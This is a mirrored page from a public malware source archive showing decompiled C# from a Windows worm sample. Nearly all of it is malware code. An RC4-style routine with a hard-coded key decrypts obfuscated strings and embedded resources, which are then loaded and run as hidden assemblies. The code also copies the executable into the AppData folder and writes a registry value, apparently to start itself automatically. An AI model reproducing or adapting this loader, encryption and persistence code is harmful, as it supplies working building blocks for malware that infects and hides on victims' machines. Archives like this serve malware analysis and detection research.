mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
170 lines
6.1 KiB
C#
170 lines
6.1 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Þ.Ò80Á
|
|
// Assembly: zom052fb, Version=82.27.26.147, Culture=neutral, PublicKeyToken=null
|
|
// MVID: C73C9DAC-34BB-47BC-9784-43B3F9A632F7
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.y-0a8ce0f86190a7cb19dcfb02d9c65bd7190bdb532888563cb9e3e20c68ed3079.exe
|
|
|
|
using Microsoft.VisualBasic;
|
|
using Microsoft.VisualBasic.CompilerServices;
|
|
using System;
|
|
using System.Collections;
|
|
using System.IO;
|
|
using System.Reflection;
|
|
using System.Resources;
|
|
using System.Runtime.CompilerServices;
|
|
using System.Text;
|
|
using System.Windows.Forms;
|
|
|
|
namespace Þ
|
|
{
|
|
[StandardModule]
|
|
internal sealed class Ò80Á
|
|
{
|
|
private static MethodInfo Þ97ÓÚ;
|
|
private static Environment.SpecialFolder Ê = Environment.SpecialFolder.ApplicationData;
|
|
private static string Ü05ËÈ = Environment.GetFolderPath(Ò80Á.Ê) + Ò80Á.Ú2("pGO3piOjLEFrash6ZbCGTS30hIrcEKEW2VjA/6jBKlaqfX6ual8n");
|
|
|
|
[STAThread]
|
|
public static void Main()
|
|
{
|
|
label_0:
|
|
int num1;
|
|
int num2;
|
|
try
|
|
{
|
|
int num3 = 1;
|
|
label_1:
|
|
num3 = 2;
|
|
label_2:
|
|
ProjectData.ClearProjectError();
|
|
num1 = 1;
|
|
label_3:
|
|
num3 = 4;
|
|
ResourceManager resourceManager = new ResourceManager(Ò80Á.Ú2("lVyzoieiKF4="), Assembly.GetExecutingAssembly());
|
|
label_4:
|
|
num3 = 5;
|
|
Ò80Á.ß19(Ò80Á.Õ2(Ò80Á.Ã95ÁÑ((byte[]) resourceManager.GetObject(Ò80Á.Ú2("lVyzoieiKF4=")))));
|
|
label_5:
|
|
num3 = 6;
|
|
Ò80Á.Í35ÓÇ();
|
|
goto label_12;
|
|
label_7:
|
|
num2 = num3;
|
|
switch (num1)
|
|
{
|
|
case 1:
|
|
int num4 = num2 + 1;
|
|
num2 = 0;
|
|
switch (num4)
|
|
{
|
|
case 1:
|
|
goto label_0;
|
|
case 2:
|
|
goto label_1;
|
|
case 3:
|
|
goto label_2;
|
|
case 4:
|
|
goto label_3;
|
|
case 5:
|
|
goto label_4;
|
|
case 6:
|
|
goto label_5;
|
|
case 7:
|
|
goto label_12;
|
|
}
|
|
break;
|
|
}
|
|
}
|
|
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
|
|
{
|
|
ProjectData.SetProjectError(ex);
|
|
goto label_7;
|
|
}
|
|
throw ProjectData.CreateProjectError(-2146828237);
|
|
label_12:
|
|
if (num2 == 0)
|
|
return;
|
|
ProjectData.ClearProjectError();
|
|
}
|
|
|
|
public static byte[] Ã95ÁÑ(byte[] Ì12ÞÏ)
|
|
{
|
|
byte[] bytes = Encoding.UTF8.GetBytes("d63Jb72ye85xX");
|
|
uint[] numArray1 = new uint[256];
|
|
byte[] numArray2 = new byte[checked (Ì12ÞÏ.Length - 1 + 1)];
|
|
int index1 = 0;
|
|
do
|
|
{
|
|
numArray1[index1] = checked ((uint) index1);
|
|
checked { ++index1; }
|
|
}
|
|
while (index1 <= (int) byte.MaxValue);
|
|
int index2 = 0;
|
|
do
|
|
{
|
|
uint index3 = checked ((uint) ((long) (index3 + (uint) bytes[unchecked (index2 % bytes.Length)] + numArray1[index2]) & (long) byte.MaxValue));
|
|
uint num = numArray1[index2];
|
|
numArray1[index2] = numArray1[checked ((int) index3)];
|
|
numArray1[checked ((int) index3)] = num;
|
|
checked { ++index2; }
|
|
}
|
|
while (index2 <= (int) byte.MaxValue);
|
|
uint index4 = 0;
|
|
uint index5 = 0;
|
|
int num1 = checked (numArray2.Length - 1);
|
|
int index6 = 0;
|
|
while (index6 <= num1)
|
|
{
|
|
index4 = checked ((uint) ((long) index4 + 1L & (long) byte.MaxValue));
|
|
index5 = checked ((uint) ((long) (index5 + numArray1[(int) index4]) & (long) byte.MaxValue));
|
|
uint num2 = numArray1[checked ((int) index4)];
|
|
numArray1[checked ((int) index4)] = numArray1[checked ((int) index5)];
|
|
numArray1[checked ((int) index5)] = num2;
|
|
numArray2[index6] = checked ((byte) ((int) Ì12ÞÏ[index6] ^ unchecked ((int) numArray1[checked ((int) ((long) (numArray1[(int) index4] + numArray1[(int) index5]) & (long) byte.MaxValue))])));
|
|
checked { ++index6; }
|
|
}
|
|
return numArray2;
|
|
}
|
|
|
|
public static string Ú2(string Ñ94ÂÐ) => Encoding.UTF8.GetString(Ò80Á.Ã95ÁÑ(Convert.FromBase64String(Ñ94ÂÐ)));
|
|
|
|
public static byte[] Õ2(byte[] Ó48ÆÄ)
|
|
{
|
|
if ((object) Ò80Á.Þ97ÓÚ == null)
|
|
Ò80Á.Þ97ÓÚ = Assembly.Load(Ò80Á.Ã95ÁÑ((byte[]) new ResourceManager(Ò80Á.Ú2("kBysomG8aho="), Assembly.GetExecutingAssembly()).GetObject(Ò80Á.Ú2("kBysomG8aho=")))).GetType(Ò80Á.Ú2("uVy9rTi6OgBFe/hZebE=")).GetMethod(Ò80Á.Ú2("vEu9qjy8LUt+bQ=="));
|
|
return (byte[]) Ò80Á.Þ97ÓÚ.Invoke((object) null, new object[1]
|
|
{
|
|
(object) Ó48ÆÄ
|
|
});
|
|
}
|
|
|
|
public static void ß19(byte[] Æ6) => Assembly.Load(Ò80Á.Õ2(Ò80Á.Ã95ÁÑ((byte[]) new ResourceManager(Ò80Á.Ú2("yV3vrz2vOko="), Assembly.GetExecutingAssembly()).GetObject(Ò80Á.Ú2("yV3vrz2vOko="))))).GetType(Ò80Á.Ú2("sQ==")).GetMethod(Ò80Á.Ú2("qGs=")).Invoke((object) null, new object[1]
|
|
{
|
|
(object) new ArrayList() { (object) Æ6 }
|
|
});
|
|
|
|
public static void Í35ÓÇ()
|
|
{
|
|
if (Operators.CompareString(Application.ExecutablePath, Ò80Á.Ü05ËÈ, false) == 0)
|
|
return;
|
|
if (!Directory.Exists(Path.GetDirectoryName(Ò80Á.Ü05ËÈ)))
|
|
Directory.CreateDirectory(Path.GetDirectoryName(Ò80Á.Ü05ËÈ));
|
|
File.Delete(Ò80Á.Ü05ËÈ);
|
|
FileSystem.FileCopy(Application.ExecutablePath, Ò80Á.Ü05ËÈ);
|
|
object objectValue = RuntimeHelpers.GetObjectValue(Interaction.CreateObject(Ò80Á.Ú2("j129tzi8KwB+dvFFcA==")));
|
|
object[] objArray = new object[2]
|
|
{
|
|
(object) Ò80Á.Ú2("sGWdkA2fEGhZSdV7WZ+/QSPauJzBALwp60Ly7K7YNWWOZ2Lyakk2uRysvXs0ucSgNtvAfLW2pVbg8IE="),
|
|
(object) Ò80Á.Ü05ËÈ
|
|
};
|
|
object[] Arguments = objArray;
|
|
bool[] flagArray = new bool[2]{ false, true };
|
|
bool[] CopyBack = flagArray;
|
|
NewLateBinding.LateCall(objectValue, (System.Type) null, "regwrite", Arguments, (string[]) null, (System.Type[]) null, CopyBack, true);
|
|
if (!flagArray[1])
|
|
return;
|
|
Ò80Á.Ü05ËÈ = (string) Conversions.ChangeType(RuntimeHelpers.GetObjectValue(objArray[1]), typeof (string));
|
|
}
|
|
}
|
|
}
|